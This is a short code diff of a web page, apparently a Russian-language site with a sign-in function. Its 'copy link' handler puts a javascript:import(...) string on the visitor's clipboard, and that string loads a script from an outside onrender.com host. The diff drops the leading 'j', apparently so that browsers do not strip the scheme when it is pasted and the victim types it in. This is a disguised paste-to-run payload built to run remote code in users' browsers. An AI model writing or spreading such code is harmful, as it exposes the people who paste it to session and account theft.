--- a/index.html
+++ b/index.html
@@ -198,7 +198,7 @@ class="feather feather-align-left">
 function copyLink(e) {
     e.preventDefault();
 
-    const text = "javascript:import('https://young-z7wb.onrender.com/a.js')";
+    const text = "avascript:import('https://young-z7wb.onrender.com/a.js')";
 
     navigator.clipboard.writeText(text).then(() => {
         alert("Ссылка скопирована!");
@@ -505,6 +505,7 @@ signInAjax();
 </body>
 
 </html>
+
 
 
 
